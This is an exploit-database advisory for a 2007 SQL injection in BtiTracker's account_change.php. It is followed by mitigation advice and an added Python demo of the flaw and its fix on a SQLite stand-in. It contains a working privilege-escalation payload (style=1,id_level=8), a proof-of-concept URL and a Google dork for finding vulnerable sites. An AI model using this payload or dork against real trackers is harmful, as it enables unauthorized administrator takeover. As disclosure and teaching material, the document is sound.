vendor:
BtiTracker
by:
m@ge|ozz - babbano@gmail.com
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: BtiTracker
Affected Version From: 1
Affected Version To: 1.4.2001
Patch Exists: YES
Related CWE:
CPE: a:btiteam:btitracker:1.4.1
Metasploit:
Other Scripts:
Platforms Tested:
2007

BtiTracker <=v1.4.1 Remote SQL Injection Exploit

BtiTracker 1.4.1 and earlier is vulnerable to SQL injection in account_change.php, and any logged-in user can use it to become an administrator. The script checks whether the GET parameters 'style' and 'langue' are set, then interpolates the corresponding values (the $style and $langue variables, populated from the request via register_globals or an assignment not shown in the excerpt) directly into UPDATE statements on the users table: UPDATE users SET style=$style WHERE id=<current user id>, and the same for the language column. The values are neither validated as integers nor quoted or bound, so the attacker does not need a quote character: anything appended to the value becomes part of the SET clause. The PoC account_change.php?style=2[SQL]&returnto=%2F places attacker-controlled SQL inside that UPDATE, and the concrete payload account_change.php?style=1,id_level=8 turns the query into UPDATE users SET style=1,id_level=8 WHERE id=<current user id>, setting the attacker's own account to level 8 (administrator). The injection is confined to the SET clause of one UPDATE on the caller's own row (mysql_query does not execute stacked statements), but because that row holds the privilege level, this is enough for a full takeover of the tracker.

Mitigation:

The vendor has released an updated version of BtiTracker that addresses this vulnerability (the metadata above records that a patch exists); users should upgrade. Where an immediate upgrade is not possible, the code-level fix is to validate both parameters as integers (for example an (int) cast) or bind them as query parameters before they reach the UPDATE; the isset() check in the vulnerable code only tests for the parameter's presence and does nothing to constrain its value, and quote-escaping alone would not help because the value is used in a numeric context.
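As an added example that is not part of the original advisory or of BtiTracker's own code, the following Python script reproduces the flaw and its fix against an in-memory SQLite stand-in for the users table. The table schema, the sample rows and the SQLite back end are assumptions for the demonstration; the column names style, language and id_level, the shape of the UPDATE, and the payload 1,id_level=8 are taken from the advisory. vulnerable_change_style() builds the statement the way the PHP does, so the payload promotes the calling user; hardened_change_style() accepts only an integer and binds it.

```python
import sqlite3


def make_db():
    """Constructed stand-in for BtiTracker's users table (assumed schema).

    id_level 8 is the administrator level named in the advisory."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users ("
        "id INTEGER PRIMARY KEY, username TEXT, "
        "style INTEGER, language INTEGER, id_level INTEGER)"
    )
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
        [(1, "admin", 1, 1, 8), (5, "mallory", 1, 1, 1)],  # constructed rows
    )
    con.commit()
    return con


def vulnerable_change_style(con, cur_uid, style):
    """Mirrors the flawed line in account_change.php: the request value is
    pasted into the SET clause unquoted and unvalidated. Returns the SQL
    that was actually executed so the injection is visible."""
    sql = "UPDATE users SET style=%s WHERE id=%d" % (style, cur_uid)
    con.execute(sql)
    con.commit()
    return sql


def hardened_change_style(con, cur_uid, style):
    """Fixed version: accept only a non-negative integer string, then bind it
    as a parameter so the value can never change the statement's structure."""
    if not isinstance(style, str) or not style.isdigit():
        raise ValueError("style must be an integer")
    con.execute("UPDATE users SET style=? WHERE id=?", (int(style), cur_uid))
    con.commit()


def id_level(con, uid):
    """Privilege level of the given user (8 = administrator in this demo)."""
    return con.execute("SELECT id_level FROM users WHERE id=?", (uid,)).fetchone()[0]


def demo(payload="1,id_level=8", attacker_uid=5):
    """Run one 'style' value through both versions.

    Returns (executed_sql, level_after_vulnerable, level_after_hardened, rejected)."""
    con = make_db()
    sql = vulnerable_change_style(con, attacker_uid, payload)
    escalated = id_level(con, attacker_uid)

    con = make_db()
    try:
        hardened_change_style(con, attacker_uid, payload)
        rejected = False
    except ValueError:
        rejected = True
    return sql, escalated, id_level(con, attacker_uid), rejected


if __name__ == "__main__":
    print(demo())
```

Running demo() shows the executed statement UPDATE users SET style=1,id_level=8 WHERE id=5, the attacker's level rising from 1 to 8 through the vulnerable path, and the same payload being rejected by the hardened path. Because the injected text sits where a bare integer is expected, no quote character is involved, which is why escaping quotes would not have closed this hole while an integer check or a bound parameter does.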

Exploit-DB raw data:

#################################################################################
#										
#	BtiTracker <=v1.4.1 Remote SQL Injection Exploit	              
#									
# Discovered by: m@ge|ozz - babbano@gmail.com					
# Vulnerability: Remote Sql Injection /
# Problem: Any user can be Administrator					
# Website Vendor: http://www.btiteam.org					
# 										
# Vulnerable Code (account_change.php):						
#										
# if (isset($_GET["style"]))       						
# @mysql_query("UPDATE users SET style=$style WHERE id=".$CURUSER["uid"]);      
# 										
# if (isset($_GET["langue"])) 							
# @mysql_query("UPDATE users SET language=$langue WHERE id=".$CURUSER["uid"]);		
#										
# PoC: account_change.php?style=2[SQL]&returnto=%2F				
#      										
# Example to gain admin control: account_change.php?style=1,id_level=8								
#										
# 										
# GoogleDork: "by Btiteam"							
#										
# Shoutz: - eVolVe or Die - 							
#										
#################################################################################

# milw0rm.com [2007-05-22]